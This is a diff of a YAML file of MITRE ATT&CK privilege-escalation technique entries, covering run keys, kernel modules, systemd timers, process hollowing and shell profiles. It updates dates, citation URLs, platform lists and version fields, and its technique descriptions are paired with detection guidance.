-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20709,9 +21027,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -20724,12 +21042,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -20765,16 +21082,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -20815,7 +21131,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: AWS - Create a group and add a user to that group
@@ -20853,138 +21168,137 @@ privilege-escalation:
         name: sh
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -21021,7 +21335,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -21047,12 +21361,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -21130,9 +21442,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1574:
@@ -21199,7 +21510,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -21273,11 +21583,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -21294,7 +21603,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -21304,7 +21612,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21313,19 +21621,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -21373,11 +21679,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -21445,23 +21752,22 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -21524,11 +21830,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -21581,8 +21886,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -21630,78 +21935,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -21749,6 +21987,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
